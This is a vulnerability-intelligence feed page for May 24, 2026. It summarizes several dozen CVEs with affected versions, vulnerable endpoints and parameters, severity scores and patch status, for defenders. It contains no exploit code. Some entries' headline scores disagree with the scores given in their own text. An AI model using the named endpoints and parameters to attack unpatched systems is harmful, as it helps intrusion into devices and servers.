THREAT ALERT

ACT NOW CVE-2026-34926 6.7 Directory traversal in Trend Micro Apex One on-premise server (versions before 14.0.0.17079) enables a highly privileged local attacker to manipulate a key server table and inject malicious code that propagates to all managed endpoint agents, effectively weaponizing the EDR platform's own distribution infrastructure. The attack requires an adversary who has already obtained administrative credentials to the Apex One server through a separate compromise vector. No public exploit code has been identified at time of analysis and the vulnerability is not listed in CISA KEV, but the changed scope (S:C) in the CVSS vector signals that a successful exploit extends impact beyond the server itself to the entire managed agent fleet. | ACT NOW CVE-2026-48172 10.0 LiteSpeed User-End cPanel Plugin before 2.4.5 allows privilege escalation (possibly to root), as exp | ACT NOW CVE-2026-9082 6.5 SQL injection in Drupal Core across six major version branches (8.9.0 through 11.3.x) enables remote unauthenticated attackers to manipulate database queries with no required privileges or user interaction, as confirmed by CVSS vector AV:N/AC:L/PR:N/UI:N. The vulnerability yields partial confidentiality and integrity impact per CVSS - enabling data enumeration and limited data manipulation - but does not grant full database control or server compromise. No active exploitation is confirmed (not listed in CISA KEV; SSVC exploitation status: none), but SSVC flags this as automatable, making opportunistic mass scanning against the large global Drupal install base a credible near-term risk. | ACT NOW CVE-2026-41091 7.8 Local privilege escalation in Microsoft Defender (Malware Protection Engine) enables an authenticated low-privileged attacker to elevate to SYSTEM by abusing improper link resolution (CWE-59) before file access. The flaw scores CVSS 7.8 with high impact to confidentiality, integrity, and availability, and no public exploit is identified at time of analysis. Microsoft has released a patch via MSRC, and there is no current CISA KEV listing or EPSS signal indicating active mass exploitation. | ACT NOW CVE-2026-45498 4.0 Denial of service in Microsoft Defender Antimalware Platform allows a local, unprivileged attacker to partially degrade availability with low attack complexity and no user interaction required. The CVSS 4.0 score reflects limited impact - confidentiality and integrity are unaffected, and availability impact is rated Low. Vendor patch is available via Microsoft Security Response Center; no public exploit identified at time of analysis and no CISA KEV listing. | ACT NOW CVE-2026-8398 9.3 Supply chain compromise of DAEMON Tools Lite for Windows delivered trojanized installers through the legitimate vendor website daemon-tools.cc from April 8 to May 5, 2026. Attackers compromised AVB Disc Soft's build infrastructure and injected malicious code into three binaries (DTHelper.exe, DiscSoftBusServiceLite.exe, DTShellHlp.exe), all signed with the vendor's legitimate code-signing certificate. This allowed remote attackers to achieve arbitrary code execution on systems installing affected versions (12.5.0.2421 through 12.5.0.2434) with no user interaction required beyond normal installation. The legitimate digital signature bypassed security controls that rely on code-signing verification, making detection extremely difficult during the compromise window. | ACT NOW CVE-2026-42897 8.1 Cross-site scripting (XSS) in Microsoft Exchange Server enables remote attackers to spoof content and steal credentials without authentication. Affects Exchange Server 2016 CU23, 2019 CU14/CU15, and Subscription Edition. Functional exploit code exists (CVSS temporal E:F) though no active exploitation confirmed at analysis time. CVSS 8.1 (High) driven by network vector, no authentication requirement, and dual confidentiality/integrity impact. Microsoft released patches via MSRC security update guide. Medium-high priority for organizations running affected Exchange versions with webmail or OWA exposed. | EMERGENCY CVE-2026-20182 10.0 Remote unauthenticated attackers can bypass peering authentication in Cisco Catalyst SD-WAN Controller (vSmart) and SD-WAN Manager (vManage) to obtain administrative privileges and manipulate network configurations across the entire SD-WAN fabric. This critical authentication bypass (CVSS 10.0) allows direct NETCONF access as a high-privileged internal user without any credentials. Cisco released fixes in May 2026 following discovery of this second authentication flaw after a February 2026 disclosure of a related vulnerability. No active exploitation confirmed in CISA KEV at time of analysis, though the maximum CVSS score and authentication bypass nature make this a priority patching target for SD-WAN deployments. | ACT NOW CVE-2026-45321 9.6 Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actions exploitation. Attackers combined pull_request_target misconfiguration, Actions cache poisoning, and OIDC token memory extraction to publish malicious code under the legitimate TanStack identity. Installing any affected version executes a 2.3 MB obfuscated payload that exfiltrates AWS/GCP/Kubernetes credentials, npm tokens, GitHub secrets, SSH keys, and HashiCorp Vault tokens over encrypted Session/Oxen messenger infrastructure. The payload propagates by republishing victim-maintained packages with identical injection. Socket.dev and the TanStack team confirmed the incident via GHSA-g7cv-rxg3-hmpx. No EPSS or CISA KEV data available for this recent supply-chain attack. CVSS 9.6 reflects the cross-scope credential theft impact (S:C/C:H/I:H), though exploitation requires user-initiated package installation (UI:R). | ACT NOW CVE-2026-42208 9.3 SQL injection in LiteLLM proxy server versions 1.81.16 through 1.83.6 allows unauthenticated remote attackers to read and modify database contents, gaining unauthorized access to managed LLM API credentials. The vulnerability is exploitable via crafted Authorization headers sent to any LLM API route (e.g., POST /chat/completions), triggering the injection through the proxy's error-handling path. Vendor-released patch available in version 1.83.7. No active exploitation confirmed (not in CISA KEV), but the attack vector is simple (CVSS 4.0: AV:N/AC:L/PR:N) and SQL injection POCs are widely known. Discovered by Tencent YunDing Security Lab. | ACT NOW CVE-2026-6973 7.2 Remote code execution in Ivanti Endpoint Manager Mobile (EPMM) allows authenticated administrators to execute arbitrary code on the server. Affects EPMM versions prior to 12.6.1.1, 12.7.0.1, and 12.8.0.1 through improper input validation vulnerabilities. While requiring high-privilege administrator credentials (CVSS PR:H), the vulnerability enables complete system compromise once authenticated, with high impact to confidentiality, integrity, and availability. No public exploit or active exploitation confirmed at time of analysis. | ACT NOW CVE-2026-0300 9.3 Remote code execution in Palo Alto Networks PAN-OS User-ID Authentication Portal (Captive Portal) allows unauthenticated attackers to execute arbitrary code with root privileges on PA-Series and VM-Series firewalls via specially crafted packets. CISA KEV confirms active exploitation in the wild with publicly available exploit code. EPSS risk assessment is not provided, but the vulnerability achieves maximum impact with minimal attack complexity (CVSS 9.3, AV:N/AC:L/PR:N), making this a critical priority for immediate remediation. The attack surface is significantly reduced when access to the portal is restricted to trusted internal networks per vendor best practices. | ACT NOW CVE-2026-41940 9.3 Authentication bypass in cPanel & WHM allows unauthenticated remote attackers to gain unauthorized access to the control panel by exploiting a flaw in the login flow. The vulnerability is confirmed actively exploited (CISA KEV) with publicly available exploit code, an EPSS score of 16.52% (95th percentile), and affects multiple long-term support branches of cPanel & WHM as well as WP Squared. Given that cPanel administers shared hosting environments, successful exploitation typically grants attackers control over many downstream customer sites. |

Daily vulnerability intelligence for defenders – fresh CVEs with exploitability signals, patch status, and action-oriented priorities from 17 sources.

CVEs published

Get CVEs that hit your stack — not 200/day

Pick your technologies, get a weekly digest by email. Free, no spam.

React Python Postgres +200 more

React Next.js Python Postgres AWS +200 more

Trending Now See all

Critical Watch See all

Attack Technique Trend

Prediction based on ZDI Disclosures & CVE data · 30 days

Analytics

Vendor Today – Quick Filter

Techniques

results

Sort:

Base Score

Vector String

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality (C)

Integrity (I)

Availability (A)

0 | 3.9| 6.9| 8.9| 10

NONE LOW MEDIUM HIGH CRITICAL

CVSS Filter – CVEs match

No CVEs match the selected criteria

Incoming 20

Pre-NVD – not yet scored

Browse older vulnerabilities in Archive

Live Feed auto-refresh 60s

Vulnerability Intelligence — May 24, 2026

33 CVEs tracked today. 0 Critical, 8 High, 14 Medium, 11 Low.

CVE-2026-48831 HIGH CVSS 7.3
Wine ships a .desktop file that registers itself as a MIME handler for EXE files and several other Windows executable file types. In some configurations, handling of an EXE file causes that file to be blindly executed with the permissions of the invoker. This allows escaping Flatpak and Snap sandbox...

Information Disclosure Microsoft
CVE-2026-48829 HIGH CVSS 7.5
Unauthenticated denial of service in GNU SASL before version 2.2.3 occurs through a NULL pointer dereference in the DIGEST-MD5 authentication mechanism. Remote attackers can crash both client and server applications by sending a malformed authentication token that lacks an equals sign character, causing the getsubopt.c parser to dereference a NULL pointer.

Denial Of Service Null Pointer Dereference
CVE-2026-9360 HIGH CVSS 7.4
Buffer overflow in Edimax EW-7438RPn Wi-Fi range extender firmware 1.28a enables authenticated remote attackers to execute arbitrary code via malformed POST requests to the wireless encryption configuration endpoint. The vulnerability requires low-privilege authentication and has publicly available exploit code. No vendor response or patch has been provided despite early disclosure attempts.

Buffer Overflow
CVE-2026-9348 HIGH CVSS 7.4
Stack-based buffer overflow in Edimax EW-7438RPn WiFi range extender firmware up to version 1.31 enables authenticated remote attackers to execute arbitrary code by sending malicious input to the /goform/mp endpoint in the web server component. Public exploit code exists on GitHub, though the vulnerability is not listed in CISA KEV. The vendor failed to respond to responsible disclosure attempts, leaving devices unpatched.

Buffer Overflow Stack Overflow
CVE-2026-9346 HIGH CVSS 7.4
Buffer overflow in Edimax EW-7438RPn WiFi range extender firmware up to version 1.31 enables authenticated remote attackers to execute arbitrary code via crafted POST requests to the wireless table management interface. The vulnerability affects the formWirelessTbl function when processing the submit-url parameter, with publicly available exploit code on GitHub demonstrating the attack method.

Buffer Overflow
CVE-2026-9345 HIGH CVSS 7.4
Buffer overflow in Edimax EW-7438RPn WiFi range extender firmware versions up to 1.31 enables authenticated remote attackers to execute arbitrary code by sending malformed parameters to the device configuration interface. The vulnerability affects the formWizSurvey function in /goform/formWizSurvey when processing ssid, manualssid, ip, mask, or gateway parameters, with publicly available exploit code existing on GitHub.

Buffer Overflow
CVE-2026-9344 HIGH CVSS 7.4
Stack-based buffer overflow in Edimax EW-7438RPn WiFi range extender firmware up to version 1.31 allows authenticated remote attackers to crash or execute code on the device by sending malicious input to the WPS configuration interface. The vulnerability occurs when processing the pinCode or wlan-url parameters in /goform/formWpsStart, with publicly available exploit code on GitHub demonstrating the attack.

Buffer Overflow Stack Overflow
CVE-2026-3515 HIGH CVSS 8.5
Command injection in Prefect 3.6.18's GitHub integration allows authenticated users to execute arbitrary git commands through the unsanitized reference field. The GitHubRepository block concatenates user input directly into git clone commands, enabling attackers to inject malicious options that can lead to SSRF, credential theft, or remote code execution. While no active exploitation is confirmed, the straightforward attack vector and high impact make this a priority for organizations using Prefect's GitHub integration features.

RCE SSRF Gitlab
CVE-2026-9373 MEDIUM CVSS 6.3
Improper authentication in JeecgBoot 3.9.1 OpenAPI endpoint allows remote attackers to bypass authentication checks and perform unauthorized actions, though exploitation is rated difficult due to high attack complexity. No public exploit code has been identified and no vendor response has been received. With CVSS 3.7 (Low severity) and AV:N/AC:H/PR:N parameters, the vulnerability poses limited immediate risk but requires monitoring given the authentication bypass nature and remote attack vector.

Authentication Bypass
CVE-2026-9372 MEDIUM CVSS 5.5
Server-side request forgery (SSRF) in ItzCrazyKns Vane through version 1.12.1 enables unauthenticated remote attackers to manipulate the baseURL parameter in the Model Provider API, potentially accessing internal resources and services. The exploit has been publicly disclosed via a GitHub issue, and the CVSS temporal score indicates proof-of-concept code exists (E:P). The vendor was notified but has not yet responded or released a patch.

SSRF
CVE-2026-9368 MEDIUM CVSS 5.5
Remote sandbox escape in NousResearch hermes-agent versions up to 2026.4.16 allows unauthenticated attackers to manipulate environment variables through the code execution tool, potentially breaking out of the intended security sandbox. The vulnerability has publicly available exploit code and the vendor has not responded to disclosure attempts, leaving systems unpatched.

Information Disclosure
CVE-2026-9367 MEDIUM CVSS 5.5
Remote command injection in NousResearch hermes-agent allows unauthenticated attackers to execute arbitrary OS commands through the terminal_tool component's approval mechanism. The vulnerability affects all versions up to commit 5157f5427f19488b31c6fdebbacd15d798ce7f63 and has publicly available exploit code demonstrating the attack. The vendor has not responded to disclosure attempts, leaving users without an official patch.

Command Injection
CVE-2026-9366 MEDIUM CVSS 5.5
Code injection in NousResearch hermes-agent 2026.4.23 allows remote unauthenticated attackers to inject and execute arbitrary code through the _scan_context_content function in agent/prompt_builder.py. The vulnerability has publicly available exploit code and affects all versions up to 2026.4.23, with the vendor failing to respond to disclosure attempts.

Code Injection
CVE-2026-9364 MEDIUM CVSS 5.5
SQL injection in Online Art Gallery Shop 1.0 allows unauthenticated remote attackers to manipulate database queries through the social_linked parameter in /admin/adminHome.php. The vulnerability has publicly available exploit code and a CVSS score of 7.3, indicating high severity with the ability to impact confidentiality, integrity, and availability of the application.

PHP SQLi
CVE-2026-9356 MEDIUM CVSS 5.5
SQL injection in SourceCodester Hospitals Patient Records Management System 1.0 enables remote unauthenticated attackers to manipulate database queries through the ID parameter in /admin/patients/manage_history.php. Public exploit code exists (GitHub), though not listed in CISA KEV. The vulnerability carries moderate risk with CVSS 7.3 reflecting potential for data theft and manipulation of patient records.

PHP SQLi
CVE-2026-9355 MEDIUM CVSS 5.5
SQL injection in SourceCodester Hospitals Patient Records Management System 1.0 allows remote attackers to compromise patient data without authentication via manipulated ID parameter in /classes/Master.php?f=save_patient_history. The vulnerability has publicly available exploit code (GitHub) and enables unauthorized database access with potential to read, modify, or delete patient records. CVSS 7.3 indicates moderate severity with no exploitation prerequisites.

PHP SQLi
CVE-2026-9354 MEDIUM CVSS 5.5
Improper output escaping in NousResearch Hermes Agent versions up to 2026.4.16 allows remote unauthenticated attackers to manipulate message formatting in Slack and Mattermost integrations, potentially leading to information disclosure and service disruption. The vulnerability is exploitable via crafted format_message arguments with low attack complexity and requires no user interaction. Public exploit code is available via GitHub Gist. The vendor did not respond to early disclosure attempts, and no patch availability is documented.

Information Disclosure Mattermost
CVE-2026-9353 MEDIUM CVSS 5.5
Remote injection vulnerability in NousResearch hermes-agent versions up to 2026.4.23 enables unauthenticated attackers to inject malicious payloads through the Skills Guard component's multi-word prompt handling mechanism. The vulnerability has publicly available exploit code and allows attackers to achieve limited confidentiality, integrity, and availability impacts without user interaction. Despite early vendor notification, no response or patch has been provided.

Information Disclosure
CVE-2026-9352 MEDIUM CVSS 5.5
Information disclosure in NousResearch hermes-agent allows remote unauthenticated attackers to extract sensitive data via crafted requests to the Messaging Gateway Handler's environment configuration function. The vulnerability affects versions up to 2026.4.23 with publicly available exploit code demonstrating the attack. EPSS data not provided, but public POC availability increases immediate risk. Vendor has not responded to disclosure, suggesting no official patch timeline.

Information Disclosure
CVE-2026-9351 MEDIUM CVSS 5.5
Path traversal in NousResearch hermes-agent through version 2026.4.16 allows remote unauthenticated attackers to bypass path restrictions and modify or disrupt file operations via the read_file tool. The flaw exists in the _is_blocked_device function within tools/file_tools.py. Public exploit code is available (EPSS data not provided, but exploit confirmed). Vendor was notified but did not respond, suggesting no official patch exists at time of analysis.

Path Traversal
CVE-2026-9350 MEDIUM CVSS 5.5
Missing authorization in NousResearch hermes-agent versions up to 2026.4.16 allows remote attackers to bypass authentication checks in the Batch Runner component, potentially executing unauthorized commands. The vulnerability affects the check_all_command_guards function in tools/approval.py and can be exploited without authentication. Publicly available exploit code exists, though the vulnerability is not yet confirmed in CISA KEV.

Authentication Bypass
CVE-2026-9349 MEDIUM CVSS 5.5
Information disclosure in Cal.com cal.diy up to version 4.9.4 allows remote unauthenticated attackers to access sensitive booking data through manipulation of cancelledBy/rescheduledBy parameters in the bookings single view API endpoint. The vulnerability affects the Generic React API's getServerSideProps function, enabling unauthorized retrieval of booking-related information. Public exploit code exists demonstrating the attack technique, and the vendor has not responded to coordinated disclosure attempts, leaving users at elevated risk until patches are self-applied.

Information Disclosure
CVE-2026-9371 LOW CVSS 2.9
Missing authentication in Vane up to 1.12.1 allows remote attackers to bypass intended access controls on API route.ts endpoints, potentially exposing or manipulating API functionality without credentials. Publicly available exploit code exists (GitHub issue #1123), though CVSS rates attack complexity as high (AC:H) with difficult exploitation, resulting in limited confidentiality, integrity, and availability impact (C:L/I:L/A:L). EPSS data not provided. Not listed in CISA KEV. Vendor (ItzCrazyKns) reportedly plans to implement basic authentication as remediation.

Authentication Bypass
CVE-2026-9370 LOW CVSS 2.9
Cryptographic salt generation in Jasypt Spring Boot library (versions ≤3.0.5 and ≤4.0.4) uses predictable values, enabling offline password cracking attacks against encrypted configuration properties. The SimpleGCMConfig class's getSecretKeySaltGenerator function generates salts without sufficient entropy, reducing the computational cost for attackers who obtain encrypted passwords to derive plaintext through dictionary or brute-force attacks. Public exploit code exists (POC available) with EPSS indicating low probability of widespread exploitation (3.7 CVSS, AC:H). Vendor has not responded to responsible disclosure as of analysis date.

Java Information Disclosure
CVE-2026-9369 LOW CVSS 1.9
Local privilege escalation in NousResearch hermes-agent 2026.4.23 allows authenticated local users to manipulate plugin discovery logic via HERMES_ENABLE_PROJECT_PLUGINS environment variable, resulting in unauthorized information disclosure and potential integrity compromise of the CLI web-dashboard interface. Publicly available exploit code exists (EPSS data not provided, not listed in CISA KEV). The vendor did not respond to responsible disclosure attempts, leaving remediation status uncertain.

Information Disclosure
CVE-2026-9365 LOW CVSS 2.9
Heap-based buffer overflow in Ettercap's GG protocol dissector (versions up to 0.8.3) allows remote attackers to potentially achieve limited confidentiality, integrity, and availability compromise through crafted network traffic. The vulnerability exists in the ec_gg.c dissector when processing Gadu-Gadu instant messaging protocol packets. Publicly available exploit code exists (GitHub issue #1306), and vendor has released patch version 0.8.4 (commit feeae6fa). Despite network attack vector, exploitation difficulty is high (AC:H) with low EPSS risk, suggesting specialized targeting rather than mass exploitation.

Buffer Overflow Heap Overflow
CVE-2026-9363 LOW CVSS 2.1
Command injection in Edimax EW-7438RPn 1.12 allows authenticated remote attackers to execute arbitrary OS commands via the 'method' parameter in the formEZCHNwlanSetup POST handler at /goform/formEZCHNwlanSetu. Public exploit code exists (CVSS E:P), enabling low-complexity attacks that compromise confidentiality, integrity, and availability at low impact levels. EPSS data not available. Not currently listed in CISA KEV, suggesting targeted rather than widespread exploitation. Vendor was notified but has not issued a patch or advisory.

Command Injection
CVE-2026-9362 LOW CVSS 2.1
Command injection in Edimax EW-7438RPn 1.12 allows authenticated remote attackers to execute arbitrary operating system commands via the max_Conn and timeOut parameters in the formConnectionSetting endpoint. The vulnerability requires low-privilege authentication but no user interaction, with public exploit code available. EPSS data not available; vendor unresponsive to disclosure.

Command Injection
CVE-2026-9361 LOW CVSS 2.1
Remote command injection in Edimax EW-7438RPn 1.12 allows authenticated attackers to execute arbitrary OS commands by manipulating the submit-url parameter in the formAccept function via /goform/formAccep endpoint. Public exploit code is available (EPSS not provided in input data). Vendor was notified but has not responded or issued a patch, leaving devices vulnerable to takeover by users with low-level credentials.

Command Injection
CVE-2026-9359 LOW CVSS 2.1
Command injection in Edimax EW-7438RPn 1.28a allows authenticated remote attackers to execute arbitrary system commands via crafted POST parameters to the /goform/formHwSet endpoint. The vulnerability affects the formHwSet function's handling of multiple configuration parameters including Antenna, Mcs, regDomain, MAC addresses, SSID, and channel settings. Public exploit code exists (CVSS E:P), significantly lowering the barrier to exploitation, though CISA KEV does not list active widespread exploitation at time of analysis.

Command Injection
CVE-2026-9358 LOW CVSS 2.1
Uncontrolled recursion in PostCSS up to 7.1.1 allows remote attackers to trigger denial of service via crafted CSS input requiring user interaction. The vulnerability resides in the toString function of AST serialization logic (src/selectors/container.js). Publicly available exploit code exists (EPSS exploitation probability should be assessed). Vendor considers this low-risk since most users compile their own CSS rather than processing untrusted user-generated CSS, indicating limited real-world attack surface in typical deployment scenarios.

Information Disclosure
CVE-2026-9357 LOW CVSS 2.0
Stored or reflected cross-site scripting in vBulletin 6.x login component allows authenticated users with low privileges to inject malicious scripts that execute when other users interact with the manipulated login function. Public proof-of-concept exists (CVSS E:P) but detailed exploitation steps are being withheld by VulDB. Vendor did not respond to disclosure, and no patch release has been announced. EPSS data unavailable; not listed in CISA KEV, suggesting limited observed exploitation despite public POC availability.

XSS
CVE-2026-9347 LOW CVSS 2.1
OS command injection in Edimax EW-7438RPn WiFi range extender firmware versions up to 1.31 allows authenticated remote attackers to execute arbitrary system commands via the formWizSurvey web interface. The vulnerability exists in the /goform/formWizSurvey endpoint where input validation fails on the ip, mask, and gateway parameters. Publicly available exploit code exists (GitHub POC published), though no active exploitation has been confirmed by CISA KEV. EPSS data not available for this recent CVE. Vendor notified but non-responsive, indicating no official patch is forthcoming.

Command Injection

Track CVEs for your stack Sign up free →

Today's Vulnerabilities Vulnerabilities